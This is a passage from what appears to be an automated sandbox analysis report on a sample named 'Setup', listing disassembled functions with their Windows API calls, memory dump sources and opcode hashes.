                                                                                                                                                                      • Part of subcall function 69DC8DCD: _vswprintf_s.LIBCMT ref: 69DC8E38
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3682816334-0
                                                                                                                                                                    • Opcode ID: 50853143664b38acd4d67957d727e2d56f28cf4f48a67f52cfcfcb3a3b3ae444
                                                                                                                                                                    • Instruction ID: 5dbb19f7faa15473269fb86778639df5d4f4c7e8795cccfa13990eadee01141f
                                                                                                                                                                    • Opcode Fuzzy Hash: 50853143664b38acd4d67957d727e2d56f28cf4f48a67f52cfcfcb3a3b3ae444
                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0153461015ADFDF00DFA4C805AAEBBBAFF40318F44C839E8149B650DB34DA19CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D78129 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,69D7AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 69D78149
                                                                                                                                                                      • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 39e83c87dfc510810d0748763729a0a50047ba754bbf915f1ea0e79199d009f6
                                                                                                                                                                    • Instruction ID: 3e3ac11beff71e5b8964b1376dfe295ce42daeb3688010a0415756403a31a7e5
                                                                                                                                                                    • Opcode Fuzzy Hash: 39e83c87dfc510810d0748763729a0a50047ba754bbf915f1ea0e79199d009f6
                                                                                                                                                                    • Instruction Fuzzy Hash: 19E01A75500208FF9B04CFA4C985D9E7BF9EB49364B108669F929D7290DB70EA10DB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DD5514 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b2a2c45b1a5020d35f984cbcb6c51a10a784b20709b6522de9d646270c24a86f
                                                                                                                                                                    • Instruction ID: 87df823d0ffc6853b71ea1fec21e80daeeb660e66a021bc6ce167519f411b6a6
                                                                                                                                                                    • Opcode Fuzzy Hash: b2a2c45b1a5020d35f984cbcb6c51a10a784b20709b6522de9d646270c24a86f
                                                                                                                                                                    • Instruction Fuzzy Hash: 11E0C235104109FFCB025F24C9098897FBAFF2A395B10C475F809CA520D732CA58DB41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7395E Relevance: 1.5, APIs: 1, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D73965
                                                                                                                                                                      • Part of subcall function 69DA8C24: __EH_prolog3.LIBCMT ref: 69DA8C2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 92e45159eb3cec8db6c46792a0f333bdaa0b1c67bb2e9fb81cb52574d1ee5e69
                                                                                                                                                                    • Instruction ID: 30c138ca784ac8eb92f787bc8d5f0cb0cceb4774bfff4ddcd2e2f20f199e400a
                                                                                                                                                                    • Opcode Fuzzy Hash: 92e45159eb3cec8db6c46792a0f333bdaa0b1c67bb2e9fb81cb52574d1ee5e69
                                                                                                                                                                    • Instruction Fuzzy Hash: A3F03979100546EFCB00DBB8C904B5DF766BF00318F14D664E1109BA91CB31E924DBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7391D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D73924
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: e44b3c848e7b7759f3971acf2f384be9224626481d90f2c3773dda91f7efb5ac
                                                                                                                                                                    • Instruction ID: 2019e7c2bde465f44bd1923eac656fceb391dd26e192cbe842829c0a2023034a
                                                                                                                                                                    • Opcode Fuzzy Hash: e44b3c848e7b7759f3971acf2f384be9224626481d90f2c3773dda91f7efb5ac
                                                                                                                                                                    • Instruction Fuzzy Hash: 03E01A39601605EFCB01DF54C900B9DBBA1FF08314F00C015F9159B760C734AA20DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D780F7 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,69DA60F1), ref: 69D7810D
                                                                                                                                                                      • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                                    • Opcode ID: 65ee790d9e4e92c2cd9731203a9303e4a9d6b17345116b3f87f24deeb30940a1
                                                                                                                                                                    • Instruction ID: 68d0de9b5862f9f0812d1ac400372e05e44b28fffefa8cd876c9b45e3298339a
                                                                                                                                                                    • Opcode Fuzzy Hash: 65ee790d9e4e92c2cd9731203a9303e4a9d6b17345116b3f87f24deeb30940a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 47D01736204349FBDF108FA1CC41EAA3BADEB45351F008031FE14CA410DB32D820DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA8380 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA8387
                                                                                                                                                                      • Part of subcall function 69DA84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794,00000000), ref: 69DA851E
                                                                                                                                                                      • Part of subcall function 69DA84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794), ref: 69DA853F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 692526729-0
                                                                                                                                                                    • Opcode ID: 519331152f1a04b9636ffdb79f897746b0c1c7df4bfe1be79a2a8d7307282852
                                                                                                                                                                    • Instruction ID: bc1964d1be046d91581394ab512d76ed57cc797e64a1a54219dc5976d76be10a
                                                                                                                                                                    • Opcode Fuzzy Hash: 519331152f1a04b9636ffdb79f897746b0c1c7df4bfe1be79a2a8d7307282852
                                                                                                                                                                    • Instruction Fuzzy Hash: D3E0C238100220A3DB01EF64CA01B8E37165F1061CF00E070EC406FA00CB354B2967F6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA833E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 36ce4532cf3b49d4c8c25d121bd4c82839e640cb0b471fb8abce13cc0844ae93
                                                                                                                                                                    • Instruction ID: 578f1255985c8740e34cd05f963e7482a71a95ee4b1ac1f0150b91ebe5f42ef7
                                                                                                                                                                    • Opcode Fuzzy Hash: 36ce4532cf3b49d4c8c25d121bd4c82839e640cb0b471fb8abce13cc0844ae93
                                                                                                                                                                    • Instruction Fuzzy Hash: 24E0C739100210A3DF02EB648A01B8E372A6F1076CF00E030E8406FA00CB358A2AABF6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBD713 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,69DC23E8,?,00000000,00000000), ref: 69DBD729
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                    • Opcode ID: 94a0be78148ecfc06285739001447e821eba0fa8c37fdc2c8c745ca364d63c22
                                                                                                                                                                    • Instruction ID: 76c88bd26754f755a004f421f1989a2e4dfe58ead8cbcf6de061d2537413836f
                                                                                                                                                                    • Opcode Fuzzy Hash: 94a0be78148ecfc06285739001447e821eba0fa8c37fdc2c8c745ca364d63c22
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DD012F2805360BFB7309F711C48CB32EADE955171355496BB852D7501C660CC49C3E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DFF14 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 698DFF21
                                                                                                                                                                      • Part of subcall function 698E007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 698E00A9
                                                                                                                                                                      • Part of subcall function 698E007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 698E00E6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$ChildEnumWindows
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1604351572-0
                                                                                                                                                                    • Opcode ID: 914d8ec8749d0a5722351308249e8966af8de6e56e6b01faa5e37af76ca63386
                                                                                                                                                                    • Instruction ID: 28d0fc59909df0143327bcffc0cdd782aafbc8518128db3caa972a8e3777649e
                                                                                                                                                                    • Opcode Fuzzy Hash: 914d8ec8749d0a5722351308249e8966af8de6e56e6b01faa5e37af76ca63386
                                                                                                                                                                    • Instruction Fuzzy Hash: 8BC08C3B0260307686307B78A808C9F299A9EA32A83090809F40082010CE114C46E6E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DABC49 Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 69DABC5A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                    • Opcode ID: 9d279bf47cea6916146d09ec1d8ab9d4d6dd794e3d42b90855171a87fbd2bf74
                                                                                                                                                                    • Instruction ID: 1451ce33d5938d31385032e1dd65137cf25e69f90c9a379a7ebf0e9a3f977cca
                                                                                                                                                                    • Opcode Fuzzy Hash: 9d279bf47cea6916146d09ec1d8ab9d4d6dd794e3d42b90855171a87fbd2bf74
                                                                                                                                                                    • Instruction Fuzzy Hash: 09C01231240204BBD7110E95CC05F817FA5E755750F104025F74886150C57198109744
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA91AF Relevance: 1.5, APIs: 1, Instructions: 11comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,69D7B029,?,0000002C,69DBD55B,?,?,?,?,00000001), ref: 69DA91C5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                                                    • Opcode ID: e10c25006553781f9851401d817bf4c59dc712229c824e469cd8277d2585e57d
                                                                                                                                                                    • Instruction ID: 77c32c8e587e9cd91dc981b1819898b38b598cde0402c34a21586ddf0bdfcf0b
                                                                                                                                                                    • Opcode Fuzzy Hash: e10c25006553781f9851401d817bf4c59dc712229c824e469cd8277d2585e57d
                                                                                                                                                                    • Instruction Fuzzy Hash: B8C08CB2080218BBDB100E818C05FA9BA2887D6720FA18022B3881449249B194109A69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DD54F2 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 69DD5505
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                    • Opcode ID: ce5c4d0741e86558ca208926775dd30911e085fa1f58ac278b46c87970e4c97e
                                                                                                                                                                    • Instruction ID: f05d1605eea53d6fc93d50749371a706aca38ecb16c919bbf9b0a3ac9b6a6c70
                                                                                                                                                                    • Opcode Fuzzy Hash: ce5c4d0741e86558ca208926775dd30911e085fa1f58ac278b46c87970e4c97e
                                                                                                                                                                    • Instruction Fuzzy Hash: 12C01232080208FBEB124E80C809B9A7E6AEBA1350F24C020B618088A08772D5A1DB84
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69901C56 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 69901C63
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: a325012290a0d2a326dcd18e9c116648a153089e4271924d0e7f68c71c43f06a
                                                                                                                                                                    • Instruction ID: 8a2f9868728f680d6390c7a87c62fcedab7b1d2e09277a645bf06d67910e0e25
                                                                                                                                                                    • Opcode Fuzzy Hash: a325012290a0d2a326dcd18e9c116648a153089e4271924d0e7f68c71c43f06a
                                                                                                                                                                    • Instruction Fuzzy Hash: EAC09B36040148B7CF111A81DC05F55BF6AEB95750F148011F60805051C773D421D6D8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DD54D6 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 69DD54E3
                                                                                                                                                                    Memory Dump Source
